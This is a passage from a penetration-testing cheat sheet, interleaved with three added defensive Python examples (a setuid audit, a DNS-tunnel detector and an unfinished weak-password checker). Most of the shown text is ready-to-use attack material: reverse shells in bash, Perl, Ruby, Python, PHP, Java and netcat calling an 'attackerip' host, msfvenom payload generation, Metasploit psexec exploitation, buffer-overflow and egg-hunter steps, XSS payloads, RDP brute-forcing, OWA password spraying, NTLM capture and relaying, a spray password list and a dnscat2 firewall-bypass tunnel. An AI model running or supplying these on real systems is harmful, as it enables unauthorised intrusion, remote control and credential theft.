402 | # Listen on port 80
403 | nc -lp 80
404 | ```
405 |
406 | ## Advanced NC Options:
407 |
408 | ### Bouncing Shell with /bin/bash:
409 | ```bash
410 | # Listen on port 31337 and attach /bin/bash to the connection (Linux side; the Windows listener above uses cmd.exe)
411 | nc -lp 31337 -e /bin/bash
412 | ```
413 |
414 | ### Randomize Output and Wait:
415 | ```bash
416 | # Scan ports 1-1000 in random order (-r) with a 1 second connection timeout (-w 1)
417 | nc -vv -r -w 1 192.168.0.10 -z 1-1000
418 | ```
419 |
420 | # Finding SUID/SGID and Orphaned Files
421 |
422 | ## Locate SUID root files:
423 | ```bash
424 | # Search for SUID root files
425 | find / -user root -perm -4000 -print
426 | ```
427 |
428 | ## Locate SGID root files:
429 | ```bash
430 | # Search for SGID root files
431 | find / -group root -perm -2000 -print
432 | ```
433 |
434 | ## Locate SUID and SGID files:
435 | ```bash
436 | # Search for both SUID and SGID files (the parentheses are required: without them -print binds only to the SGID test and SUID-only files are silently dropped)
437 | find / \( -perm -4000 -o -perm -2000 \) -print
438 | ```
439 |
440 | ## Find files that do not belong to any user:
441 | ```bash
442 | # Search for files without an assigned user
443 | find / -nouser -print
444 | ```
445 |
446 | ## Locate files that do not belong to any user group:
447 | ```bash
448 | # Search for files without an assigned user group
449 | find / -nogroup -print
450 | ```
451 |
452 | ## Find symbolic links and display their targets:
453 | ```bash
454 | # Search for symbolic links and show their targets
455 | find / -type l -ls
456 | ```
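
The find commands above list setuid/setgid and orphaned files; what a defender then wants is the subset that is also world-writable and the subset that is new against a known-good baseline. The following is an added example (not from the cheat sheet) that does both in Python over a constructed sample tree built under a temp dir, so it runs without root; `build_sample_tree` and `SAMPLE_BASELINE` are constructed for the demo, and `root` would be `/` in real use.

```python
import os
import stat
import tempfile


def find_setid_files(root):
    """Sorted paths (relative to root) of regular files with the setuid or setgid bit.
    Equivalent to: find ROOT -type f \\( -perm -4000 -o -perm -2000 \\) -print"""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks during an audit
            except OSError:
                continue  # unreadable, or vanished between listing and stat
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def world_writable_setid(root):
    """Setuid/setgid files that are also world-writable: any local user can replace
    the privileged program, so these are the first thing to fix."""
    return [
        rel for rel in find_setid_files(root)
        if os.lstat(os.path.join(root, rel)).st_mode & stat.S_IWOTH
    ]


def new_since_baseline(root, baseline):
    """Setuid/setgid files present now but absent from a baseline list captured from a
    known-good image (for example the output of find_setid_files at build time)."""
    return sorted(set(find_setid_files(root)) - set(baseline))


def build_sample_tree():
    """Constructed sample tree: two expected setuid binaries, one setgid helper, one
    plain file, and one setuid file that is world-writable and not in the baseline."""
    root = tempfile.mkdtemp(prefix="setid-audit-")
    layout = {
        "bin/passwd": 0o4755,
        "bin/sudo": 0o4755,
        "bin/ls": 0o755,
        "opt/helper": 0o2755,
        "opt/bad": 0o4777,
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w"):
            pass
        os.chmod(path, mode)  # setting the bits on files you own needs no root
    return root


# Constructed baseline: what a clean build of the sample tree is expected to contain.
SAMPLE_BASELINE = ["bin/passwd", "bin/sudo", "opt/helper"]

if __name__ == "__main__":
    root = build_sample_tree()
    print("setuid/setgid:", find_setid_files(root))
    print("world-writable setuid/setgid:", world_writable_setid(root))
    print("new since baseline:", new_since_baseline(root, SAMPLE_BASELINE))
```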
457 |
458 | ## Python Shell Escalation:
459 | ```bash
460 | # Upgrade a limited shell to an interactive bash PTY via Python
461 | python -c 'import pty;pty.spawn("/bin/bash")'
462 | ```
463 |
464 |
465 | # Python, Ruby, and PHP HTTP Servers:
466 |
467 | ## Python 2 HTTP Server:
468 | ```bash
469 | # Start a Python 2 HTTP server
470 | python2 -m SimpleHTTPServer
471 | ```
472 |
473 | ## Python 3 HTTP Server:
474 | ```bash
475 | # Start a Python 3 HTTP server
476 | python3 -m http.server
477 | ```
478 |
479 | ## Ruby HTTP Server (WEBrick):
480 | ```bash
481 | # Start a Ruby WEBrick HTTP server on port 8888
482 | ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start'
483 | ```
484 |
485 | ## PHP HTTP Server:
486 | ```bash
487 | # Start a PHP HTTP server on IP 0.0.0.0 and port 8888
488 | php -S 0.0.0.0:8888
489 | ```
490 |
491 | # Getting Process PID:
492 |
493 | ## Find PID for a Port:
494 | ```bash
495 | # Get the PID for a process using port 80
496 | fuser -nv tcp 80
497 | ```
498 |
499 | ## Kill a Process by Port:
500 | ```bash
501 | # Kill the process using port 80
502 | fuser -k -n tcp 80
503 | ```
504 |
505 | # Using Hydra to Crack RDP:
506 |
507 | ```bash
508 | # Use Hydra to crack RDP with a username list and password file
509 | hydra -l admin -P /root/Desktop/passwords -t 1 -vV -f -o hydra_output.txt rdp://X.X.X.X
510 | ```
511 |
512 | # Mounting a Remote Windows Shared Folder (SMB):
513 |
514 | ```bash
515 | # Mount a remote Windows shared folder to /mnt/remote/
516 | smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
517 | ```
518 |
519 | # Compiling an Exploit in Kali:
520 |
521 | ## Compile a 32-bit Executable:
522 | ```bash
523 | # Compile a 32-bit executable from hello.c
524 | gcc -m32 -o output32 hello.c
525 | ```
526 |
527 | ## Compile a 64-bit Executable:
528 | ```bash
529 | # Compile a 64-bit executable from hello.c
530 | gcc -m64 -o output hello.c
531 | ```
532 |
533 |
534 | # Compiling a Windows Exploit in Kali:
535 |
536 | ```bash
537 | # Download and install MinGW
538 | wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
539 | wine mingw-get-setup.exe
540 | # Select mingw32-base during installation
541 | # Navigate to the MinGW bin directory
542 | cd /root/.wine/drive_c/windows
543 | wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
544 | cd /root/.wine/drive_c/MinGW/bin
545 | # Compile the exploit.c to ability.exe with necessary libraries
546 | wine gcc -o ability.exe /tmp/exploit.c -lwsock32
547 | # Execute the compiled Windows exploit
548 | wine ability.exe
549 | ```
550 |
551 | # NASM (Netwide Assembler) Commands:
552 |
553 | ```bash
554 | # Assemble an assembly source file to binary
555 | nasm -f bin -o payload.bin payload.asm
556 |
557 | # Assemble to ELF format and link, then display the disassembled code
558 | nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
559 | ```
560 |
561 | # SSH Penetration:
562 |
563 | ```bash
564 | # SSH tunnel with dynamic port forwarding on local port 1080
565 | ssh -D 127.0.0.1:1080 -p 22 user@IP
566 |
567 | # Add SOCKS4 proxy configuration to /etc/proxychains.conf
568 | # Append: socks4 127.0.0.1 1080
569 |
570 | # Use proxychains to route commands through the SSH tunnel
571 | proxychains commands target
572 |
573 | # SSH penetration from one network to another, chaining multiple SSH connections
574 |
575 | # First SSH tunnel with dynamic port forwarding
576 | ssh -D 127.0.0.1:1080 -p 22 user1@IP1
577 |
578 | # Add SOCKS4 proxy configuration to /etc/proxychains.conf
579 | # Append: socks4 127.0.0.1 1080
580 |
581 | # Second SSH tunnel with dynamic port forwarding through the first tunnel
582 | proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
583 |
584 | # Add SOCKS4 proxy configuration to /etc/proxychains.conf
585 | # Append: socks4 127.0.0.1 1081
586 |
587 | # Use proxychains to route commands through the second SSH tunnel
588 | proxychains commands target
589 | ```
590 |
591 | # Using Metasploit for Penetration
592 |
593 | Metasploit is a powerful penetration testing tool that provides a wide range of functionalities for identifying vulnerabilities and executing exploits. Here are some useful Metasploit commands and techniques:
594 |
595 | 1. **IP Configuration and Routing:**
596 | - Description: Obtain the IP address of the compromised system, configure routing, and pivot through it.
597 | ```bash
598 | meterpreter > ipconfig
599 | IP Address: 10.1.13.3
600 | meterpreter > run autoroute -s 10.1.13.0/24
601 | meterpreter > run autoroute -p
602 | 10.1.13.0 255.255.255.0 Session 1
603 | ```
604 |
605 | 2. **Exploiting Remote Systems:**
606 | - Description: Exploit a remote Windows system using the SMB psexec exploit module.
607 | ```bash
608 | meterpreter > Ctrl+Z
609 | msf auxiliary(tcp) > use exploit/windows/smb/psexec
610 | msf exploit(psexec) > set RHOST 10.1.13.2
611 | msf exploit(psexec) > exploit
612 | meterpreter > ipconfig
613 | IP Address: 10.1.13.2
614 | ```
615 |
616 | 3. **Exploit-DB Search:**
617 | - Description: Search for exploits in the Exploit-DB database based on keywords or criteria.
618 | ```bash
619 | git clone https://github.com/offensive-security/exploit-database.git
620 | cd exploit-database
621 | ./searchsploit -u
622 | ./searchsploit apache 2.2
623 | ./searchsploit "Linux Kernel"
624 | ```
625 |
626 | 4. **Exploit-DB CSV Filtering:**
627 | - Description: Filter and search for specific exploits within the Exploit-DB CSV file.
628 | ```bash
629 | cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
630 | ```
631 |
632 | 5. **MSF Payload Generation:**
633 | - Description: Generate various Metasploit payloads for different platforms and scenarios.
634 | ```bash
635 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe > system.exe
636 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > exploit.php
637 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f asp > file.asp
638 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -b "\x00" -f c
639 | ```
640 |
641 | 6. **MSF Payloads for Linux and Shellcode:**
642 | - Description: Generate payloads and shellcode for Linux and Windows.
643 | ```bash
644 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf -a x86 > shell
645 | msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 -f c
646 | ```
647 |
648 | 7. **Other Payload Types:**
649 | - Description: Generate payloads for Python, ASP, Bash, and more.
650 | ```bash
651 | msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
652 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 > shell.asp
653 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh
654 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php
655 | # Add ' LPORT= -f exe -a x86 > shell.exe
657 | ```
659 | # Linux commonly used security commands
660 |
661 | find / -uid 0 -perm -4000
662 |
663 | find / -perm -o=w
664 |
665 | find / -name " " -print
666 | find / -name ".." -print
667 | find / -name ". " -print
668 | find / -name " " -print
669 |
670 | find / -nouser
671 |
672 | lsof +L1
673 |
674 | lsof -i
675 |
676 | arp -a
677 |
678 | getent passwd
679 |
680 | getent group
681 |
682 | for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done
683 |
684 | cat /dev/urandom| tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?='|fold -w 12| head -n 4
685 |
686 | find . | xargs -I file lsattr -a file 2>/dev/null | grep '^....i'
687 | chattr -i file
688 |
689 | # Windows Buffer Overflow exploits
690 |
691 | msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c
692 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c
693 |
694 | # COMMONLY USED BAD CHARACTERS:
695 |
696 | \x00\x0a\x0d\x20 For http request
697 | \x00\x0a\x0d\x20\x1a\x2c\x2e\x3a\x5c Ending with (0\n\r_)
698 |
699 | # Regular command:
700 | pattern create
701 | pattern offset (EIP Address)
702 | pattern offset (ESP Address)
703 | pad up to the EIP offset, then place the JMP ESP address in EIP (ESP then points at the shellcode)
704 |
705 | !pvefindaddr pattern_create 5000
706 | !pvefindaddr suggest
707 | !pvefindaddr nosafeseh
708 |
709 |
710 | !mona config -set workingfolder C:\Mona\%p
711 |
712 | !mona config -get workingfolder
713 | !mona mod
714 | !mona bytearray -b "\x00\x0a"
715 | !mona pc 5000
716 | !mona po EIP
717 | !mona suggest
718 |
719 | # SEH - Structured exception handling
720 |
721 | Note: SEH ("Structured Exception Handling") is the mechanism the Windows operating system provides to programmers for handling processor errors and exceptions.
722 |
723 | # https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH
724 | # http://baike.baidu.com/view/243131.htm
725 | !mona suggest
726 | !mona nosafeseh
727 | nseh="\xeb\x06\x90\x90" (next SEH record)
728 | iseh= !pvefindaddr p1 -n -o -i (POP POP RETURN, i.e. POP r32, POP r32, RETN)
729 |
730 | # ROP (DEP)
731 |
732 | Note: ROP ("Return-Oriented Programming") is an exploitation technique that lets an attacker execute code despite defenses such as non-executable memory and code signing.
733 |
734 | DEP ("Data Execution Prevention") is a set of hardware and software technologies that strictly separate code from data in memory, so that data cannot be executed as code.
735 |
736 | # https://en.wikipedia.org/wiki/Return-oriented_programming
737 | # https://zh.wikipedia.org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B
738 | # https://en.wikipedia.org/wiki/Data_Execution_Prevention
739 | # http://baike.baidu.com/item/DEP/7694630
740 | !mona modules
741 | !mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
742 | !mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)
743 |
744 | # ASLR - Address space layout randomization
745 | # https://en.wikipedia.org/wiki/Address_space_layout_randomization
746 | !mona noaslr
747 | # EGG Hunter technology
748 |
749 | Egg hunting can be categorised as "staged shellcode": a small, specially crafted piece of shellcode searches memory for the actual (larger) shellcode (the "egg") and then transfers execution to it. In other words, a short stub runs first, locates the real shellcode and executes it. See the forum thread (pediy.com) and the other references linked below for details.
750 |
751 | # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
752 | # http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf
753 | # http://www.fuzzysecurity.com/tutorials/expDev/4.html
754 | !mona jmp -r esp
755 | !mona egg -t lxxl
756 | \xeb\xc4 (jump backward -60)
757 | buff=lxxllxxl+shell
758 | !mona egg -t 'w00t'
759 |
760 | # GDB Debugger commonly used commands
761 |
762 | break *_start
763 | next
764 | step
765 | n
766 | s
767 | continue
768 | c
769 |
770 | # Data
771 | checking 'REGISTERS' and 'MEMORY'
772 |
773 | # Display the register values: (Decimal,Binary,Hex)
774 | print /d --> Decimal
775 | print /t --> Binary
776 | print /x --> Hex
777 | O/P :
778 | (gdb) print /d $eax
779 | $17 = 13
780 | (gdb) print /t $eax
781 | $18 = 1101
782 | (gdb) print /x $eax
783 | $19 = 0xd
784 | (gdb)
785 |
786 | # Display the value of a specific memory address
787 | command : x/nyz (Examine)
788 | n --> Number of fields to display ==>
789 | y --> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
790 | z --> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
791 |
792 | # BASH reverse shell
793 |
794 | bash -i >& /dev/tcp/X.X.X.X/443 0>&1
795 |
796 | exec /bin/bash 0&0 2>&0
798 |
799 | 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
802 |
804 | exec 5<>/dev/tcp/attackerip/4444
805 |
806 | cat <&5 | while read line; do $line 2>&5 >&5; done # or:
807 | while read line 0<&5; do $line 2>&5 >&5; done
808 |
809 | /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
810 | /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
811 |
812 | # PERL reverse shell
813 |
814 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
815 |
816 | # Win platform
817 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
818 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
819 |
820 | # RUBY reverse shell
821 |
822 | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
823 |
824 | # Win platform
825 | ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
826 | ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
827 |
828 | # PYTHON reverse shell
829 |
830 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
831 |
832 | # PHP reverse shell
833 |
834 | php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");'
835 |
836 | # JAVA reverse shell
837 |
838 | r = Runtime.getRuntime()
839 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
840 | p.waitFor()
841 |
842 | # NETCAT reverse shell
843 |
844 | nc -e /bin/sh attackerip 4444
845 | nc -e /bin/sh 192.168.37.10 443
846 |
847 | # If the -e parameter is disabled, you can try the following command
848 | # mknod backpipe p && nc attackerip 443 0backpipe
849 | /bin/sh | nc attackerip 443
850 | rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/
851 |
852 | # If the installed version of netcat does not support the above, try the following command
853 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
854 |
855 | # TELNET reverse shell
856 |
857 | # If netcat is not available
858 | mknod backpipe p && telnet attackerip 443 0backpipe
859 |
860 | # XTERM reverse shell
861 |
862 | # Enable the X server (display :1 listens on TCP port 6001)
863 |
864 | apt-get install xnest
865 | Xnest :1
866 |
867 | # Remember to authorize the connection from the target IP
868 | xterm -display 127.0.0.1:1
869 | # Grant access
870 | xhost +targetip
871 |
872 | # Connect back to our X server on the target machine
873 | xterm -display attackerip:1
874 | /usr/openwin/bin/xterm -display attackerip:1
875 | or
876 | $ DISPLAY=attackerip:0 xterm
877 |
878 | # XSS
879 |
880 | # https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
881 | ("< iframes > src=http://IP:PORT iframes >")
882 |
885 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
886 |
887 | ";!--"=&{()}
888 |
891 |
"">
892 |
897 | perl -e 'print "
";' > out
898 |
901 | (">< iframes http://google.com < iframes >)
902 |
905 | ">
906 | %253cscript%253ealert(document.cookie)%253c/script%253e
907 | ">alert(document.cookie)
908 | %22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
909 |
910 |
911 | # SSH Over SCTP (using Socat)
912 |
913 | $ socat SCTP-LISTEN:80,fork TCP:localhost:22
914 | $ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
915 | $ ssh -lusername localhost -D 8080 -p 1337
916 |
917 | # Metagoofil – Metadata collection tool
918 |
919 | Note: Metagoofil is a tool for collecting information using Google.
920 | $ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html
921 |
922 | # Use a DNS tunnel to bypass the firewall
923 |
924 | $ apt-get update
925 | $ apt-get -y install ruby-dev git make g++
926 | $ gem install bundler
927 | $ git clone https://github.com/iagox86/dnscat2.git
928 | $ cd dnscat2/server
929 | $ bundle install
930 | $ ruby ./dnscat2.rb
931 | dnscat2> New session established: 16059
932 | dnscat2> session -i 16059
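
On the defender's side, a DNS tunnel like the one above stands out in query logs: many never-repeating, long, high-entropy subdomains under one zone, often as TXT/CNAME queries. The following is an added example (not from the cheat sheet or the dnscat2 project) that scores zones from a constructed sample log; the log format, the `SAMPLE_LOG` lines, the thresholds and the "zone = last two labels" rule are all assumptions for the demo.

```python
import math
from collections import defaultdict

# Constructed sample query log (not captured traffic), one query per line:
# "<timestamp> <client> <qname> <qtype>". The example.net lines imitate the shape
# of tunnelled traffic: long, never-repeating, hex-looking labels sent as TXT/CNAME.
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.0.0.5 www.example.com A
2024-05-01T10:00:02 10.0.0.5 mail.example.com MX
2024-05-01T10:00:03 10.0.0.7 cdn.example.com A
2024-05-01T10:00:04 10.0.0.7 www.example.com AAAA
2024-05-01T10:00:05 10.0.0.9 4f2e9ac7b1d8630e57fa2c9b0d41e8f6.3a7c1d9e5b20.tunnel.example.net TXT
2024-05-01T10:00:05 10.0.0.9 9c03d7e1f52ab46c8e19d3f7a0b25c6e.d48f1a0c7e93.tunnel.example.net TXT
2024-05-01T10:00:06 10.0.0.9 2b7e6f1a9d30c45b8a2f7e19c6d0b35a.71e3a9c5f0b2.tunnel.example.net CNAME
2024-05-01T10:00:06 10.0.0.9 e10f4a7c3b9d25e6f8c1a0d73b4e9f52.5c2d8e0a1f7b.tunnel.example.net TXT
2024-05-01T10:00:07 10.0.0.9 6d8b3e0f1c7a52d9e4b6f2a1c8d0e375.b9a4f01e6c3d.tunnel.example.net TXT
2024-05-01T10:00:07 10.0.0.9 a7c2e9f04d1b6835f9e7a2c4d0b1e86f.0e7f3c1a9d5b.tunnel.example.net CNAME
2024-05-01T10:00:08 10.0.0.9 0e5f1d9a3c7b28e4f6a0d2c9b1e7f435.c1b6e3a8d0f9.tunnel.example.net TXT
2024-05-01T10:00:08 10.0.0.9 f38a1c0e7d2b95f4a6e1c3d8b0f27e5a.8d4a0f7c2e1b.tunnel.example.net TXT
"""

# Record types a tunnel favours because their answers carry more payload than an A record.
BULK_TYPES = {"TXT", "CNAME", "MX", "NULL"}


def shannon_entropy(text):
    """Bits per character: hex-encoded payload sits near 4, real hostnames far lower."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname, zone_labels=2):
    """Split a query name into (zone, subdomain). Assumption: the zone is the last
    two labels; a real deployment would consult the public suffix list instead."""
    labels = qname.rstrip(".").lower().split(".")
    zone = ".".join(labels[-zone_labels:])
    sub = ".".join(labels[:-zone_labels])
    return zone, sub


def zone_stats(log_text):
    """Per-zone features: query count, distinct names, mean subdomain length,
    mean subdomain entropy and the share of bulk record types."""
    acc = defaultdict(lambda: {"queries": 0, "names": set(), "len": 0, "ent": 0.0, "bulk": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than crash on them
        _ts, _client, qname, qtype = parts
        zone, sub = split_qname(qname)
        st = acc[zone]
        st["queries"] += 1
        st["names"].add(qname.lower())
        st["len"] += len(sub)
        st["ent"] += shannon_entropy(sub.replace(".", ""))
        if qtype.upper() in BULK_TYPES:
            st["bulk"] += 1
    return {
        zone: {
            "queries": st["queries"],
            "unique_names": len(st["names"]),
            "mean_sub_len": st["len"] / st["queries"],
            "mean_entropy": st["ent"] / st["queries"],
            "bulk_type_share": st["bulk"] / st["queries"],
        }
        for zone, st in acc.items()
    }


def flag_tunnels(log_text, min_unique=5, min_len=30.0, min_entropy=3.0):
    """Zones whose queries look like a data channel: many distinct names that are
    long and high-entropy. The thresholds are starting points to tune per network."""
    return {
        zone
        for zone, st in zone_stats(log_text).items()
        if st["unique_names"] >= min_unique
        and st["mean_sub_len"] >= min_len
        and st["mean_entropy"] >= min_entropy
    }


if __name__ == "__main__":
    for zone, st in sorted(zone_stats(SAMPLE_LOG).items()):
        print(zone, st)
    print("suspected tunnel zones:", flag_tunnels(SAMPLE_LOG))
```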
933 |
939 | # Red-Team and Infrastructure Assessments
940 |
941 | ### External recon
942 |
943 | https://github.com/dcsync/recontools
944 |
945 | ### O365 bruting
946 |
947 | `python3 office365userenum.py -u test.txt -v -o output.txt --password 'Password1'`
948 |
949 | Enumeration (opsec safe):
950 |
951 | `python o365creeper.py -f test.txt`
952 |
953 | https://github.com/0xZDH/o365spray
954 |
955 | ### subdomain finder
956 |
957 | https://spyse.com/
958 |
959 | ### Cert search
960 | https://crt.sh
961 | `%.blah.com`
962 | ### search categorized expired domain
963 | `python3 ./domainhunter.py -r 1000`
964 |
965 | ### Metadata
966 | `PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com`
967 |
968 | ## Domain User Enumeration
969 |
970 | ### MailSniper
971 |
972 | #### Usernameharvest
973 | `Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt`
974 | #### Domainnameharvest
975 | `Invoke-DomainHarvestOWA -ExchHostname mail.domain.com`
976 | #### OWA Spray
977 | `Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt`
978 |
979 | ### Grab employee names from LinkedIn
980 |
981 | `theharvester -d blah.com -l 1000 -b linkedin`
982 |
983 | https://github.com/m8r0wn/CrossLinked
984 |
985 | ### Extract LinkedIn details from snov.io
986 |
987 | Regex to extract emails
988 |
989 | `grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"`
990 |
991 | ### Extract from burp
992 |
993 | `cat linkedin.txt | tr , '\n' | sed 's/\"//g' | awk '/"title":{"textDirection":"FIRST_STRONG"/{getline; print}'`
994 |
995 | ### Change format to b.lah
996 |
997 | `awk '=FS tolower(substr(,1,1)$NF)' linkedin-user-list.txt | awk '{ print }'`
998 |
999 | `awk '{print $0,tolower(substr($1,1,1)$NF)}' names.txt`
1000 |
1001 | ### Check usernames against AD:
1002 |
1003 | Handy if you have generated a list from LinkedIn or otherwise have a list of usernames.
1004 |
1005 | `nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"`
1006 |
1007 | username list is located at `/usr/local/share/nmap/nselib/data/usernames.lst` in Kali
1008 |
1009 | ### Null sessions
1010 |
1011 | Still works on infrastructure that was upgraded from Windows 2000 or 2003.
1012 |
1013 | `net use \\IP_ADDRESS\ipc$ "" /user:""`
1014 |
1015 | Use enum4linux, enum or Dumpsec following the null session setup.
1016 |
1017 | ### GPP
1018 |
1019 | https://bitbucket.org/grimhacker/gpppfinder/src/master/
1020 |
1021 | `findstr /S /I cpassword \\\sysvol\\policies\*.xml`
1022 |
1023 | ## situational awareness
1024 |
1025 | https://github.com/dafthack/HostRecon
1026 |
1027 | Privesc checks:
1028 | https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
1029 |
1030 | ## Network Attacks
1031 |
1032 | ### Responder
1033 |
1034 | Grab NetNTLM hashes off the network
1035 |
1036 | #### Without wpad:
1037 |
1038 | `responder -I eth0`
1039 |
1040 | #### With wpad:
1041 |
1042 | `responder -I eth0 --wpad -b -f -F`
1043 |
1044 | #### Filter logs from logs folder and remove machine accounts:
1045 |
1046 | `sort -m *.txt | uniq -d | awk '!/\$/'`
1047 |
1048 | #### Cracking with John:
1049 |
1050 | `john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt`
1051 |
1052 | Use hashcat on a more powerful box. This is only for easy wins.
1053 |
1054 | #### NTLM Relaying
1055 |
1056 | `ntlmrelayx.py -tf targets.txt -c `
1057 |
1058 | ### MITM6
1059 |
1060 | `python mitm6.py -d blah.local`
1061 |
1062 | #### Capture hashes
1063 |
1064 | `impacket-smbserver hiya /tmp/ -smb2support`
1065 |
1066 | ## Bruteforce domain passwords
1067 | ### Common Passwords
1068 |
1069 | $Company1
1070 | $Season$Year
1071 | Password1
1072 | Password!
1073 | Welcome1
1074 | Welcome!
1075 | Welcome@123
1076 | P@55word
1077 | P@55w0rd
1078 | $month$year
1079 |
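The list above is exactly what a password filter should reject before a spray ever gets to try it. The following is an added example (not from the cheat sheet) that detects those patterns, including leetspeak variants like P@55w0rd and $Season$Year / $month$year suffixes; the pattern names, the `LEET` substitution table and the `Contoso` company name are assumptions for the demo.

```python
import re

SEASONS = ("spring", "summer", "autumn", "fall", "winter")
MONTHS = ("january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december")

# Substitutions users make to satisfy "must contain a symbol/digit" rules (assumed table).
LEET = {"a": "[a@4]", "s": "[s$5]", "o": "[o0]", "e": "[e3]", "i": "[i1!]"}

# Anything after the base word: separators, digits, trailing punctuation
# (the "1", "!", "@123" suffixes in the list above).
SUFFIX = r"[^a-z0-9]*\d*[^a-z0-9]*"
# A two- or four-digit year, optionally surrounded by punctuation ($Season$Year, $month$year).
YEAR = r"[^a-z0-9]*(\d{2}|\d{4})[^a-z0-9]*"


def leet_regex(word):
    """Regex matching `word` with any combination of the LEET substitutions applied."""
    return "".join(LEET.get(ch, re.escape(ch)) for ch in word.lower())


def weak_pattern(password, company_names=()):
    """Name of the cheat-sheet pattern the password fits, or None if it fits none."""
    pw = password.lower()
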